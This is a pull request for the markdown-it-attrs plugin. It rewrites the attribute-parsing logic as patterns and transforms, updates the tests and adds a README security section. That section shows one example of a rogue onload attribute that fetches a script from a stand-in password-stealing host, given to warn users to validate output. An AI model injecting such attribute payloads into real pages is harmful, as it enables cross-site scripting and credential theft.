### PR TITLE
rewrite logic as patterns and transforms

### DIFF
--- a/ISSUE_TEMPLATE.md
+++ b/ISSUE_TEMPLATE.md
@@ -1,0 +1,16 @@
+This is an issue template. Fill in your problem description here, replacing this text. Below you should include examples.
+
+Example input:
+```md
+this is the markdown I'm trying to parse {.replace-me}
+```
+
+Current output:
+```html
+<p class="replace-me">this is the markdown I'm trying to parse</p>
+```
+
+Expected output:
+```html
+<p class="replace-me">this is the markdown I'm trying to parse</p>
+```

--- a/README.md
+++ b/README.md
@@ -38,8 +38,15 @@ nums = [x for x in range(10)]
 </code></pre>
 ```
 
-**Note:** Plugin does not validate any input, so you should validate the attributes in your html output if security is a concern.
+## Security
+**NOTE!**
 
+`markdown-it-attrs` does not validate attribute input. You should validate your output HTML if security is a concern (use a whitelist).
+
+For example, a user may insert rogue attributes like this:
+```js
+![](img.png){onload=fetch(https://imstealingyourpasswords.com/script.js).then(...)}
+```
 
 ## Install
 
@@ -90,7 +97,7 @@ Output:
 </ul>
 ```
 
-If you need the class to apply to the ul element, use a new line:
+If you need the class to apply to the `<ul>` element, use a new line:
 ```md
 - list item **bold**
 {.red}
@@ -103,42 +110,29 @@ Output:
 </ul>
 ```
 
-Unfortunately, as of now, attributes on new line will apply to opening `ul` or `ol` for previous list item:
+If you have nested lists, curlys after new lines will apply to the nearest `<ul>` or `<ol>` list. You may force it to apply to the outer `<ul>` by adding curly below on a paragraph by it own:
 ```md
-- applies to
-  - ul of last
-  {.list}
-{.item}
+- item
+  - nested item {.a}
+{.b}
 
-
-- here
-  - we get
-  {.blue}
-- what's expected
-{.red}
+{.c}
 ```
 
-Which is not what you might expect. [Suggestions are welcome](https://github.com/arve0/markdown-it-attrs/issues/32). Output:
+Output:
 ```html
-<ul>
-  <li>applies
-    <ul class="item list">
-      <li>ul of last</li>
+<ul class="c">
+  <li>item
+    <ul class="b">
+      <li class="a">nested item</li>
     </ul>
   </li>
-</ul>
-
-<ul class="red">
-  <li>here
-    <ul class="blue">
-      <li>we get</li>
-    </ul>
-  </li>
-  <li>what's expected</li>
 </ul>
 ```
 
-If you need finer control, look into [decorate](https://github.com/rstacruz/markdown-it-decorate).
+This is not optimal, but what I can do at the momemnt. For further discussion, see https://github.com/arve0/markdown-it-attrs/issues/32.
+
+If you need finer control, [decorate](https://github.com/rstacruz/markdown-it-decorate) might help you.
 
 
 ## Custom blocks

--- a/test.js
+++ b/test.js
@@ -9,7 +9,7 @@ describe('markdown-it-attrs.utils', () => {
   it('should parse {.class #id key=val}', () => {
     var src = '{.red #head key=val}';
     var expected = [['class', 'red'], ['id', 'head'], ['key', 'val']];
-    var res = utils.getAttrs(src, 1, src.length-1);
+    var res = utils.getAttrs(src, 0);
     assert.deepEqual(res, expected);
   });
 });
@@ -28,7 +28,7 @@ describe('markdown-it-attrs', () => {
 
   it('should add attributes when {} in last line', () => {
     src = 'some text\n{with=attrs}';
-    expected = '<p with="attrs">some text\n</p>\n';
+    expected = '<p with="attrs">some text</p>\n';
     assert.equal(md.render(src), expected);
   });
 
@@ -89,7 +89,7 @@ describe('markdown-it-attrs', () => {
   });
 
   it('should add classes in nested lists', () => {
-    src = '- item 1{.a}\n';
+    src =  '- item 1{.a}\n';
     src += '  - nested item {.b}\n';
     src += '  {.c}\n';
     src += '    1. nested nested item {.d}\n';
@@ -209,10 +209,11 @@ describe('markdown-it-attrs', () => {
   });
 
   it('should support nested lists', () => {
-    src = '- item\n';
-    src += '  - nested';
-    src += '  {.red}';
-    src += '{.blue}';
+    src =  '- item\n';
+    src += '  - nested\n';
+    src += '  {.red}\n';
+    src += '\n';
+    src += '{.blue}\n';
     expected = '<ul class="blue">\n';
     expected += '<li>item\n';
     expected += '<ul class="red">\n';

--- a/test.js
+++ b/test.js
@@ -207,5 +207,20 @@ describe('markdown-it-attrs', () => {
     expected += '</table>\n';
     assert.equal(md.render(src), expected);
   });
+
+  it('should support nested lists', () => {
+    src = '- item\n';
+    src += '  - nested';
+    src += '  {.red}';
+    src += '{.blue}';
+    expected = '<ul class="blue">\n';
+    expected += '<li>item\n';
+    expected += '<ul class="red">\n';
+    expected += '<li>nested</li>\n';
+    expected += '</ul>\n';
+    expected += '</li>\n';
+    expected += '</ul>\n';
+    assert.equal(md.render(src), expected);
+  });
 });
 


### PR DESCRIPTION
Fixes issue #32

The new logic works like this:

1. Try matching pattern to token stream.
2. If pattern matches, run `pattern.transform`.
3. `pattern.transform` finds attributes and alters token stream accordingly.

A patterns consist of several tests. Each test must contain either
`shift` or `position`. For each token, tests of all patterns are rerun, such
that you can match which tokens follow each other in the token stream.

Example:

```js
{
  /**
   * | h1 |
   * | -- |
   * | c1 |
   * {.c}
   */
  name: 'tables',
  tests: [
    {
      shift: 0,
      type: 'table_close'
    }, {
      shift: 1,
      type: 'paragraph_open'
    }, {
      shift: 2,
      type: 'inline',
      content: utils.hasCurly('only')
    }
  ],...
```

The pattern above will match the token stream if
1. current token is of type table_close
2. the next token is a paragraph_open
3. the token after paragraph_open is of type inline
4. and it has content with curly

One may also specify patterns of children:
```js
    /**
     * - item
     * {.a}
     */
    name: 'list softbreak',
    tests: [
      {
        shift: -2,
        type: 'list_item_open'
      }, {
        shift: 0,
        type: 'inline',
        children: [
          {
            position: -2,
            type: 'softbreak'
          }, {
            position: -1,
            content: utils.hasCurly('only')
          }
        ]
      }
    ],...
```

The children pattern is similar as previous example, but uses `position`
here instead of `shift`. This makes it easy to specify last token (position: -1).

A transform is usually something like this:
1. get attributes
2. find correct token where attributes should be set
3. set attributes
4. remove curly from output

Example:
```js
transform: (tokens, i) => {
  let token = tokens[i];
  let start = token.info.lastIndexOf('{');
  let attrs = utils.getAttrs(token.info, start);
  utils.addAttrs(attrs, token);
  token.info = utils.removeCurly(token.info);
}
```

Note that keys in tests may be:

1. boolean | number | string: strict compare with token
2. function: function is called with token[key], should return true or false
3. array of functions: same as above, but all functions are called
4. array of tests: only for the key `children`, same as a token test,
   but will loop childrens of token, note that token should then be of type 'inline'